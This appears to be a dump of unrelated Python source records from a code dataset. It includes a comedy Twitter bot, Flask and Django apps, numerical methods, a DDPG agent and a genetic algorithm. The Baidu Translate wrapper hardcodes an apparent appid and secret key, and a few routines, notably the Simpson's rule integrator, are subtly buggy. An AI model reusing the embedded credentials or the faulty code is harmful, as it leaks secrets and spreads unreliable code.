\"内海「どうもーミルクボーイです。お願いします。」\\n\\n\"\r\n\r\n text2 = \"内海「あーありがとうございますー。\"\r\n if len(tsukami) >= 10:\r\n text2 += 'ね、今、[' + tsukami + ']をいただきましたけどもね。'\r\n text2 += 'こんなんなんぼあっても良いですからね、'\r\n else:\r\n text2 += 'ね、今、何もいただけませんでしたけどもね。'\r\n text2 += '何ももらえなくてもね、聞いてもらえるだけ'\r\n text2 += 'ありがたいですよ。いうとりますけどもね。」\\n\\n'\r\n return text, text2\r\n\r\n\r\ndef introduction(category, pred1, pred2):\r\n text = '駒場「うちのおかんがね、好きな[' + category + ']があるらしいんやけど、その名前をちょっと忘れたらしくてね。」\\n\\n'\r\n text += '内海「好きな[' + category + ']忘れてもうて。どうなってんねんそれ。\\n\\n'\r\n\r\n text2 = '内海「ほんでもおかんが好きな[' + category + ']なんて、[' + pred1 + ']か[' + pred2 + ']くらいでしょう。」\\n\\n'\r\n text2 += '駒場「それが違うらしいねんな」\\n\\n'\r\n\r\n text3 = '内海「ほんだら俺がね、おかんの好きな[' + category + ']一緒に考えてあげるから、どんな特徴言うてたかとか教えてみてよ。」\\n\\n'\r\n return text, text2, text3\r\n\r\n\r\ndef 
daily():\n schedule.every().day.at(\"06:00\").do(tweet)\n schedule.every().day.at(\"09:00\").do(tweet)\n schedule.every().day.at(\"12:00\").do(tweet)\n schedule.every().day.at(\"15:00\").do(tweet)\n schedule.every().day.at(\"18:00\").do(tweet)\n schedule.every().day.at(\"21:00\").do(tweet)\n schedule.every().day.at(\"00:00\").do(tweet)\n while True:\n schedule.run_pending()\n time.sleep(300)\n req = requests.get(\"https://www.milkboy-core-ai.tech\")\n print('successfully accessed' if req.status_code == requests.codes.ok else 'access failed')\n\n\ndef always():\n while True:\n auto_reply()\n\n\nAPI = Twitter(auth=get_auth())\nt = threading.Thread(target=daily)\nt2 = threading.Thread(target=always)\nt.start()\nt2.start()","sub_path":"config/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":9321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3925556","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : weather_app.py\n# @Author: huifer\n# @Date : 2018/8/23\nfrom pyecharts_javascripthon.api import TRANSLATOR\nfrom flask import Flask, render_template\nfrom myVisual.wa import *\nfrom myVisual.weather import *\nfrom myVisual.my_map import *\n\napp = Flask(__name__)\n\nmy_weather = Weather(path=\"weather-heihe.xls\")\n\n\n@app.route(\"/year/\")\ndef year_with_month_line(year):\n # _bar = my_pie()\n _bar = my_weather.get_year_with_month_line(year=year)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\n@app.route(\"/allday/\")\ndef tmins_tmaxes_line(year):\n _bar = my_weather.get_tmins_tmaxes_line(year=year)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\n@app.route(\"/pm2_5/heatmap/\")\ndef pm2_5_show(heatmap):\n my_weather = Weather(path=\"aqi_ranking.json\")\n _bar = my_weather.get_pm_2_5_map(heatmap)\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"pyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.render_embed,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\n\nif __name__ == '__main__':\n REMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n app.run(\n port=8080,\n host='127.0.0.1',\n debug=True\n )\n","sub_path":"myVisual/api/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210606994","text":"from django.urls import include, path\nfrom rest_framework_nested import routers\nfrom justapp.views import StudentViewSet, SchoolViewSet, StudentSchoolViewSet\nfrom justapp.services import Service1\n\n# create router for schools and students endpoint\nrouter = routers.SimpleRouter()\nrouter.register(r'schools', 
SchoolViewSet)\nrouter.register(r'students', StudentViewSet)\n\n# register nested student-school endpoint\nschools_router = routers.NestedSimpleRouter(router, r'schools', lookup='school')\nschools_router.register(r'students', StudentSchoolViewSet, basename='student-school ')\n\n# assign url pattern from the routers\nurlpatterns = [\n path(r'', include(router.urls)),\n path(r'', include(schools_router.urls)),\n path('service1', Service1.call),\n]","sub_path":"src/django_main/django_main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498736799","text":"from sympy import *\nimport numpy as np\nimport scipy.optimize as opt\n\n\n\ndef simpson_compuesto(f,a,b,n):\n if(n//2!=0):\n x = symbols('x')\n d_4 = diff(f, n=4)\n f_4 = -1 * abs(d_4)\n\n f=lambdify(x,f)\n f_4 = lambdify(x, f_4)\n d_4 = lambdify(x, d_4)\n\n\n vx=np.linspace(a,b,n)\n I=f(vx[0]+vx[n-1])\n h=(b-a)/(n-1)\n\n for i in range(1,(int((n/2)-1))):\n I+=2*f(vx[2*i])\n I+=4*f(vx[2*i-1])\n I=(I+4*f(vx[n-1]))*h/3\n beta = abs(d_4(opt.minimize_scalar(f_4, bounds=[a, b], method='bounded').x))\n\n error=beta*((b-a)*h**4)/180\n return (I,error)\n\n print(\"No se puede trabajar con un numero n par de puntos\")\n return None\n\nf='ln(x)'\n\na=2\nb=5\nn=239\n\nvalues=simpson_compuesto(f,a,b,n)\nif(values!=None):\n print(\"El valor aproximado es de \"+str(values[0])+\" con un error maximo de \"+str(values[1]))\n","sub_path":"Integracion Numerica/Regla de Simpson Compuesta/simpson compuesto por formula.py","file_name":"simpson compuesto por formula.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"13271621","text":"from random import sample\nfrom string import ascii_lowercase\n\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import BooleanProperty\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.recycleboxlayout import RecycleBoxLayout\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\n\nkv = \"\"\"\n:\n canvas.before:\n Color:\n rgba: (0.5, 0.5, 0.1, 0.3) if self.selected else (0, 0, 1, 1)\n Rectangle:\n pos: self.pos\n size: self.size\n Label:\n:\n canvas.before:\n Color:\n rgba: 0.5, 0.5, 0.5, 1\n Rectangle:\n size: self.size\n pos: self.pos\n value: ''\n Label:\n text: root.value\n\n:\n canvas:\n Color:\n rgba: 0.3, 0.3, 0.3, 1\n Rectangle:\n size: self.size\n pos: self.pos\n rv: rv\n orientation: 'vertical'\n GridLayout:\n cols: 3\n rows: 2\n size_hint_y: None\n height: dp(108)\n padding: dp(8)\n spacing: dp(16)\n Button:\n text: 'Populate list'\n on_press: root.populate()\n Button:\n text: 'Sort list'\n on_press: root.sort()\n Button:\n text: 'Clear list'\n on_press: root.clear()\n BoxLayout:\n spacing: dp(8)\n Button:\n text: 'Insert new item'\n on_press: root.insert(new_item_input.text)\n TextInput:\n id: new_item_input\n size_hint_x: 0.6\n hint_text: 'value'\n padding: dp(10), dp(10), 0, 0\n BoxLayout:\n spacing: dp(8)\n Button:\n text: 'Update first item'\n on_press: root.update(update_item_input.text)\n TextInput:\n id: update_item_input\n size_hint_x: 0.6\n hint_text: 'new value'\n padding: dp(10), dp(10), 0, 0\n Button:\n text: 'Remove 
first item'\n on_press: root.remove()\n\n RecycleView:\n id: rv\n scroll_type: ['bars', 'content']\n scroll_wheel_distance: dp(114)\n bar_width: dp(10)\n # viewclass: 'Row'\n viewclass: 'HolderItem'\n RecycleBoxLayout:\n default_size: None, dp(56)\n default_size_hint: 1, None\n size_hint_y: None\n height: self.minimum_height\n orientation: 'vertical'\n spacing: dp(2)\n\"\"\"\n\nBuilder.load_string(kv)\n\n\nclass TestButtonOne(Button):\n data = {}\n\n def set_data(self, data):\n self.data = data\n\n def on_press(self):\n print(self.data['value'])\n\n\nclass HolderItem(RecycleDataViewBehavior, GridLayout):\n index = None\n selected = BooleanProperty(False)\n selectable = BooleanProperty(False)\n cols = 3\n\n def __init__(self, **kwargs):\n print(\"HolderItem initialized, keyword args = %s\" % str(kwargs))\n super(HolderItem, self).__init__(**kwargs)\n self.myBtn1 = TestButtonOne(text=\"Button 1\")\n self.myBtn2 = Button(text='Button 2')\n self.add_widget(self.myBtn1)\n self.add_widget(self.myBtn2)\n self.flag = False\n\n def refresh_view_attrs(self, rv, index, data):\n print(\"HolderItem.refresh_view_attrs() called.\")\n\n if self.flag:\n for child in self.children:\n if child.id == \"myLabel\":\n self.remove_widget(child)\n else:\n self.flag = True\n\n myLabel = Label(text=data['value'], id=\"myLabel\")\n self.index = index\n self.myBtn1.set_data(data)\n # print(str(data['value']))\n self.add_widget(myLabel)\n\n return super(HolderItem, self).refresh_view_attrs(rv, index, data)\n\n\nclass Test(BoxLayout):\n\n def populate(self):\n self.rv.data = [{'value': ''.join(sample(ascii_lowercase, 6))}\n for x in range(50)]\n\n def sort(self):\n self.rv.data = sorted(self.rv.data, key=lambda x: x['value'])\n\n def clear(self):\n self.rv.data = []\n\n def insert(self, value):\n self.rv.data.insert(0, {'value': value or 'default value'})\n\n def update(self, value):\n if self.rv.data:\n self.rv.data[0]['value'] = value or 'default new value'\n self.rv.refresh_from_data()\n\n def remove(self):\n if self.rv.data:\n self.rv.data.pop(0)\n\n\nclass TestApp(App):\n def build(self):\n return Test()\n\n\nif __name__ == '__main__':\n TestApp().run()","sub_path":"scratch/RecycleViewExample.py","file_name":"RecycleViewExample.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"78670174","text":"\nTEST_STRINGS=['(())',\n '()()',\n '(((',\n '(()(()(',\n '))(((((',\n '())',\n '))(',\n ')))',\n ')())())',\n ')',\n '()())'\n ]\n\ndef floor_counter(string):\n \"\"\"\n Interprets the string and returns the resulting floor\n :param string: sting of parenthesis that encodes up and downs\n :return: the floor santa ends up on\n \"\"\"\n num_ups=sum(map(lambda x : 1 if '(' in x else 0, string))\n num_downs=sum(map(lambda x : 1 if ')' in x else 0, string))\n return num_ups-num_downs\n\ndef floor_finder(string, target_floor):\n \"\"\"\n finds the position in the string where santa first enters the floor in question\n :param string: string or parenthesis encoding up and downs\n :param target_floor: the target floor\n :return: the position in the string where santa first enters the target floor (starts at 1)\n \"\"\"\n curr_floor=0\n\n for index in range(0,len(string)):\n if string[index]=='(':\n curr_floor=curr_floor+1\n elif string[index]==')':\n curr_floor=curr_floor-1\n\n if curr_floor==target_floor:\n return index+1\n return -1#never reached the target floor\n\n\nif __name__==\"__main__\":\n #Part1:\n\n #Tests\n\n #Single 
String:\n \"\"\"floor_counter(TEST_STRINGS[0])\"\"\"\n\n #all tests\n \"\"\"for curr_string in TEST_STRINGS:\n print(\"{} results in {}\".format(curr_string,floor_counter(curr_string)))\n\"\"\"\n #Real Data\n with open(\"Day1_input.txt\",\"r\")as input_file:\n input_str=input_file.read()\n print(\"Floor {}\".format(floor_counter(input_str)))\n\n #part 2\n\n #tests\n floor_finder(\")\",-1)\n\n for curr_string in TEST_STRINGS:\n print(\"{} results in {}\".format(curr_string, floor_finder(curr_string,-1)))\n\n #real data\n floor_finder(input_str,-1)\n print(\"done\")","sub_path":"Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631440341","text":"age = input (\"Are you cigarette addict older than 75 years old? : (Yes/No)\").title().strip() == \"Yes\"\r\nchronic = input (\"Do you have a severe chronic disease? : (Yes/No)\").title().strip() == \"Yes\"\r\n\r\nimmune = input(\"Is your immune system too weak? : (Yes/No)\").title().strip() == \"Yes\"\r\n\r\nprint(\"age answer = \", age, \"\\nchronic answer = \", chronic, \"\\nimmune answer = \", immune)\r\n\r\nif age or chronic or immune :\r\n print(\"You are in the risky group\")\r\nelse :\r\n print(\"You are not in the risky group\")\r\n","sub_path":"assignment-2.py","file_name":"assignment-2.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"449183499","text":"#3.\tВ массиве случайных целых чисел поменять местами минимальный\n# и максимальный элементы.\nimport random\nK = 10\na = []\nfor i in range(K):\n a.append(random.randrange(K))\n\nmax_i = 0\nmin_i = 0\nmax = 0\nmin = K\n\nfor i, val in enumerate(a):\n if val > max:\n max_i = i\n max = val\n if val < min:\n min_i = i\n min = val\nprint(a)\na[min_i], a[max_i] = a[max_i], a[min_i]\nprint(a)\n","sub_path":"Lesson_3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595431766","text":"# -*- coding: utf-8 -*-\n\nimport http.client\nimport hashlib\nimport urllib\nimport random\n\ndef BTl(text,from_Lang = 'auto',go_Lang = 'zh'):\t\t# 参数(翻译文本,文本语言,翻译语言)\n\tdef md5(str):\n\t\tm = hashlib.md5(str.encode(encoding='utf-8'))\n\t\treturn m.hexdigest()\n\n\tappid = '20160223000013089'\n\tsecretKey = 'c85CO1I41ekgnmhKI5Ol'\n\n\n\thttpClient = None\n\tmyurl = '/api/trans/vip/translate'\n\tq = str(text)\n\tfromLang = str(from_Lang)\n\ttoLang = str(go_Lang)\n\tsalt = str(random.randint(32768, 65536))\n\n\tsign = md5(appid+q+salt+secretKey)\n\tmyurl = myurl+'?appid='+appid+'&q='+urllib.parse.quote(q)+'&from='+fromLang+'&to='+toLang+'&salt='+salt+'&sign='+sign\n\n\ttry:\n\t\thttpClient = http.client.HTTPConnection('api.fanyi.baidu.com')\n\t\thttpClient.request('GET', myurl)\n\n\t\t#response是HTTPResponse对象\n\t\tresponse = httpClient.getresponse()\n\t\tjson_text = response.read()\n\n\t\t#提取\n\t\ta = eval(json_text)\n\t\tb = eval(str(a['trans_result']))\n\t\tc = eval(str(b[0]))\n\t\tText = c['dst']\n\t\treturn Text\n\texcept Exception as e:\n\t\treturn e\n\tfinally:\n\t\tif httpClient:\n\t\t\thttpClient.close()\n","sub_path":"BaiduTranslate.py","file_name":"BaiduTranslate.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"120203805","text":"\n\nimport sklearn\n\nfrom 
sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\n#import matplotlib.pyplot as plt\n\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, make_scorer, mean_squared_error\n\n# If true, include make and model in Random Forest\n# Shows how much make and model come into play, but when when we calculate prices\n# we should omit to see if the models are overpriced\nincludeMakeAndModel = True\n\n\n\ndef GetDataMatrix():\n \n # Data frame with make and model\n Xmodelmake = pd.read_csv(\"./data.csv\",header=0, usecols=(0,2,3,4,5,6,7,8,9,10,11,12,13,));\n Z=pd.read_csv(\"./data.csv\",header=0, usecols=(9,));\n X = Xmodelmake\n Y = pd.read_csv(\"./data.csv\",header=0, usecols=(14,));\n\n #X, Y, Xmodelmake = shuffle(X, Y, Xmodelmake)\n \n \n # Turns categorical data into binary values across many columns \n X = pd.get_dummies(X, dummy_na = False, columns=['Make', 'Engine Fuel Type', 'Transmission Type', 'Driven_Wheels', 'Vehicle Size', 'Vehicle Style'] );\n \n # Fill the null values with zeros\n X.fillna(-1, inplace=True);\n return (X, Y, Z,Xmodelmake)\n\n\n\n\n(X, Y,Z, Xmodelmake) = GetDataMatrix() #Gets the X,Y\n\n# Turn into a proper one D arrayY = numpy.ravel(Y);\nY_unraveled = np.ravel(Y);\n\n\npd.DataFrame(X).to_csv(\"car_fea.csv\")\n\n\npd.DataFrame(Y).to_csv(\"car_price.csv\")\n\nA=np.zeros((Z.shape[0],10))\nm1=\"Factory Tuner\"\nm2=\"Luxury\"\nm3=\"High-Performance\"\nm4=\"Performance\"\nm5=\"Flex Fuel\"\nm6=\"Hatchback\"\nm7=\"Diesel\"\nm8=\"Crossover\"\nm9=\"Exotic\"\nm10=\"Hybrid\"\ni=0\n\n\n\nZ = Z.values\nZ_new=Z.astype(str)\nprint(Z_new[0])\n\n\nprint(Z_new.dtype)\n\nfor i in range(Z_new.shape[0]) :\n #temp=Z_new[i]\n #print(\"hi:\",temp)\n #result = [x.strip() for x in Z_new[i].split(',')]\n result = np.char.split(Z_new[i], sep =',')\n #print(\"sddddd\",out_arr) \n #print(result[0])\n for j in range(len(result[0])):\n \n #print( m6==result[0][j])\n \n \n if result[0][j] == m1:\n A[i,0]=1\n print( m1==result[0][j])\n elif result[0][j] == m2:\n A[i,1]=1\n print( m2==result[0][j])\n elif result[0][j] == m3:\n A[i,2]=1\n print( m3==result[0][j])\n elif result[0][j] == m4:\n A[i,3]=1\n print( m4==result[0][j])\n elif result[0][j] == m5:\n A[i,4]=1\n print( m5==result[0][j])\n elif result[0][j] == m6:\n A[i,5]=1\n print( m6==result[0][j])\n elif result[0][j] == m7:\n A[i,6]=1\n print( m7==result[0][j])\n elif result[0][j] == m8:\n A[i,7]=1\n print( m8==result[0][j])\n elif result[0][j] == m9:\n A[i,8]=1\n print( m9==result[0][j])\n elif result[0][j] == m10:\n A[i,9]=1\n print( m10==result[0][j])\n elif result[0][j] == \"nan\":\n print( \"naaaaaaaaaaaaaaaaaan\") \n else:\n print(\"fucccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\")\n print(result[0][j])\n print(\"oooffffkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk\")\n \n \n\n\n#np.savetxt(\"carZ.csv\", Z, delimiter=\",\")\nnp.savetxt(\"carA.csv\", A, delimiter=\",\")","sub_path":"phone/cardata.py","file_name":"cardata.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302237511","text":"from agents.base_agent import BaseAgent\n\nimport os\nimport numpy as np\nimport tensorflow 
as tf\n\nclass DDPGAgent(BaseAgent):\n \"\"\"\n A DDPG agent implementation for continuous cases.\n \"\"\"\n\n def __init__(self, q_network, p_network, alpha, tau, q_lr, p_lr):\n self.q_network = q_network\n self.p_network = p_network\n self.alpha = alpha\n\n self.q_optim = tf.keras.optimizers.Adam(lr=q_lr)\n self.p_optim = tf.keras.optimizers.Adam(lr=p_lr, clipnorm=5.)\n\n self.target_q_network = tf.keras.models.clone_model(self.q_network)\n self.target_p_network = tf.keras.models.clone_model(self.p_network)\n\n self.target_q_network.set_weights(self.q_network.get_weights())\n self.target_p_network.set_weights(self.p_network.get_weights())\n\n self.tau = tau\n \n def __call__(self, x):\n \"\"\"\n Call the p-network to get action with given state.\n \"\"\"\n\n flatten = False\n if len(x.shape) == 1:\n x = np.array([x])\n flatten = True\n\n u = self.p_network.predict(tf.convert_to_tensor(x))\n if flatten:\n u = u.flatten()\n\n return u\n \n\n def train(self, exps):\n \"\"\"\n Train the network with given experiences.\n \"\"\"\n\n xs, us, cs, x_nexts, terminals = [], [], [], [], []\n for exp in exps:\n x, u, c, x_next, terminal = exp\n xs.append(x)\n us.append(u)\n cs.append(c)\n x_nexts.append(x_next)\n if terminal:\n terminals.append(1.0)\n else:\n terminals.append(0.0)\n \n xs = tf.convert_to_tensor(np.array(xs), dtype=tf.float32)\n us = tf.convert_to_tensor(np.array(us), dtype=tf.float32)\n cs = tf.convert_to_tensor(np.array(cs), dtype=tf.float32)\n x_nexts = tf.convert_to_tensor(np.array(x_nexts), dtype=tf.float32)\n terminals = tf.convert_to_tensor(np.array(terminals), dtype=tf.float32)\n\n ## update q-network\n with tf.GradientTape() as tape:\n # q = self.q_network(tf.concat([xs, us], 1))\n q = self.q_network([xs, us])\n q = tf.reshape(q, [-1])\n u_nexts = self.target_p_network(x_nexts)\n # q_= self.target_q_network(tf.concat([x_nexts, u_nexts], 1))\n q_= self.target_q_network([x_nexts, u_nexts])\n q_= tf.reshape(q_, [-1])\n q_target = cs + self.alpha * q_ * (1-terminals)\n\n L = tf.losses.MSE(q_target, q)\n\n q_grads = tape.gradient(L, self.q_network.trainable_weights)\n self.q_optim.apply_gradients(grads_and_vars=zip(q_grads, self.q_network.trainable_weights))\n\n ## update p-network\n with tf.GradientTape() as tape:\n # J = self.q_network(tf.concat([xs, self.p_network(xs)], 1))\n J = self.q_network([xs, self.p_network(xs)])\n J = tf.reduce_mean(J)\n \n p_grads = tape.gradient(J, self.p_network.trainable_weights)\n self.p_optim.apply_gradients(grads_and_vars=zip(p_grads, self.p_network.trainable_weights))\n\n ## update target networks\n self.update_target_networks()\n \n\n def update_target_networks(self):\n \"\"\"\n Update target networks.\n \"\"\"\n\n source_params = self.q_network.trainable_weights + self.p_network.trainable_weights\n target_params = self.target_q_network.trainable_weights+self.target_p_network.trainable_weights\n\n for target, source in zip(target_params, source_params):\n target.assign(target * (1-self.tau) + source * self.tau)\n\n\n def save(self, path, name):\n \"\"\"\n Save the networks to path.\n \"\"\"\n\n self.q_network.save(os.path.join(path, f\"{name}_q_network.h5\"))\n self.p_network.save(os.path.join(path, f\"{name}_p_network.h5\"))\n\n print(f\"Models are saved to {path}\")\n","sub_path":"Project/agents/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"461029265","text":"import pygame\r\nfrom characters import 
Characters\r\n\r\nclass Hero(Characters):\r\n\r\n # Import Hero image\r\n hero_image = pygame.image.load(\"./images/hero.png\")\r\n\r\n # Initialize with the location of the hero\r\n def __init__(self, x, y):\r\n Characters.__init__(self, x, y, 0, 0)\r\n self.image = pygame.image.load(\"./images/hero.png\").convert_alpha()\r\n self.rect = self.image.get_rect()\r\n self.rect.center = self.x, self.y\r\n\r\n def hero_dead(self):\r\n self.dead = True\r\n font = pygame.font.Font(None, 60)\r\n text = font.render(\"HA! You Lose!\", True, (0, 0, 0))\r\n self.image = text\r\n self.x = 120\r\n self.y = 150\r\n self.dir_x = 0 \r\n self.dir_y = 0\r\n \r\n def hero_restart(self):\r\n self.image = pygame.image.load(\"./images/hero.png\").convert_alpha()\r\n self.x = 256\r\n self.y = 240\r\n self.dir_x = 0\r\n self.dir_y = 0\r\n self.dead = False","sub_path":"hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"151602759","text":"\"\"\"\n// Time Complexity : O(N)\n// Space Complexity : O(N)\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\"\"\"\nclass Solution(object):\n def longestPalindrome(self, s):\n hash = set()\n for c in s:\n if c not in hash:\n hash.add(c)\n else:\n hash.remove(c)\n # len(hash) is the number of the odd letters\n if len(s) > 0:\n return len(s) - len(hash) + 1\n else:\n return 0","sub_path":"Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"566162395","text":"import hashlib\n\nimport numpy as np\n\nfrom helper import load_housing_data\n\n\"\"\"\nPrepare test set and train set.\n\"\"\"\n\n\ndef split_training_set(data, test_radio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_radio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]\n\n\ndef test_set_check(identifier, test_ratio, hash):\n return hash(np.int64(identifier)).digest()[-1] < 256 * test_ratio\n\n\ndef split_train_test_by_id(data, test_ratio, id_column, hash=hashlib.md5):\n ids = data[id_column]\n in_test_set = ids.apply(lambda id_:test_set_check(id_, test_ratio, hash))\n return data.loc[~in_test_set], data.loc[in_test_set]\n\n\ndata = load_housing_data()\nhousing_with_id = data.reset_index()\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, 'index')\nprint(len(train_set), len(test_set))\n","sub_path":"housing_price.py","file_name":"housing_price.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293286961","text":"# coding: utf-8\n# refer to https://blog.csdn.net/zzzzjh/article/details/80633573\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nclass GA(object):\n def __init__(self, x_range, fitness_function, pop_size, iteration_max, p_crossover, p_mutation, plot):\n self.bounds_begin = x_range[0] # lower bound\n self.bounds_end = x_range[1] # upper bound\n self.fitness_function = fitness_function\n self.bit_length = int(np.log2((self.bounds_end - self.bounds_begin) / 0.0001)) + 1 # the length of chromosome\n self.pop_size = pop_size\n self.iteration_max = iteration_max\n self.p_crossover = p_crossover\n 
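        # Note: bit_length is chosen above so that the 2**bit_length distinct
        # chromosomes cover [bounds_begin, bounds_end] at roughly 0.0001
        # resolution; a chromosome decodes as
        #   x = bounds_begin + transform2to10(dna) * (bounds_end - bounds_begin) / (2**bit_length - 1)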
self.p_mutation = p_mutation\n        self.population = np.random.randint(0, 2, size = (self.pop_size, self.bit_length)) # initialize the population\n        self.plot = plot\n\n    # compute the cumulative selection probabilities from the fitness values\n    def fitness(self, population):\n        fit_value = []\n        cumsump = []\n        for i in population:\n            x = self.transform2to10(i)\n            xx = self.bounds_begin + x * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n            s = self.fitness_function(xx)\n            fit_value.append(s)\n        f_sum = sum(fit_value)\n        every_population = [x / f_sum for x in fit_value]\n        cumsump.append(every_population[0])\n        every_population.remove(every_population[0])\n        for j in every_population:\n            p = cumsump[-1] + j\n            cumsump.append(p)\n        return cumsump\n\n    # select two individuals for crossover (roulette-wheel selection)\n    def select(self, cumsump):\n        seln = []\n        for i in range(2):\n            j = 1\n            r = np.random.uniform(0, 1)\n            prand = [x - r for x in cumsump]\n            while prand[j] < 0:\n                j = j + 1\n            seln.append(j)\n        return seln\n\n    # crossover the selected pair\n    def crossover(self, seln, pc):\n        d = self.population[seln[1]].copy()\n        f = self.population[seln[0]].copy()\n        r = np.random.uniform()\n        if r < pc:\n            c = np.random.randint(1, self.bit_length - 1)\n            a = self.population[seln[1]][c:]\n            b = self.population[seln[0]][c:]\n            d[c:] = b\n            f[c:] = a\n            g = d\n            h = f\n        else:\n            g = self.population[seln[1]]\n            h = self.population[seln[0]]\n        return g, h\n\n    # mutate a single chromosome\n    def mutation(self,scnew,p_mutation):\n        r = np.random.uniform(0, 1)\n        if r < p_mutation:\n            v = np.random.randint(0, self.bit_length)\n            scnew[v] = abs(scnew[v] - 1)\n        return scnew\n    \n    # convert the binary chromosome to decimal\n    def transform2to10(self, population):\n        x = 0\n        n = self.bit_length\n        p = population.copy()\n        p = p.tolist()\n        p.reverse()\n        for j in range(n):\n            x = x + p[j] * pow(2, j)\n        return x\n\n\n    def solver(self):\n        scnew = []\n\n        # decode the initial x\n        decode_dna = self.transform2to10(self.population[0])\n        curr_x = self.bounds_begin + decode_dna * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n        print('Init x: ', curr_x)\n\n        cumsump = self.fitness(self.population)\n\n        start_time = time.time()\n\n        # use the GA to find the minimum\n        for i in range(self.iteration_max):\n            for j in range(0, self.pop_size, 2):\n                seln = self.select(cumsump) # returns the selected indices\n                scro = self.crossover(seln, self.p_crossover) # returns two chromosomes\n                s1 = self.mutation(scro[0], self.p_mutation)\n                s2 = self.mutation(scro[1], self.p_mutation)\n                scnew.append(s1)\n                scnew.append(s2)\n\n            self.population = scnew\n            cumsump = self.fitness(self.population)\n\n            # decode the x\n            x_list = []\n            for dna in self.population:\n                decode_dna = self.transform2to10(dna)\n                curr_x = self.bounds_begin + decode_dna * (self.bounds_end - self.bounds_begin) / (pow(2, self.bit_length) - 1)\n                x_list.append(curr_x)\n\n            # get y from the decoded x\n            y_list = []\n            for curr_x in x_list:\n                y_list.append(self.fitness_function(curr_x))\n\n            # get the minimum\n            fmin = y_list.index(min(y_list))\n            x = x_list[fmin]\n\n            x_list_in_gen = x_list[-(self.pop_size):]\n            y_list_in_gen = y_list[-(self.pop_size):]\n\n            if i % 100 == 0:\n                print('Current x: ', x)\n\n            # show the animation\n            if self.plot:\n                scatter_best_x = x\n                scatter_best_y = self.fitness_function(x)\n                plt_x = 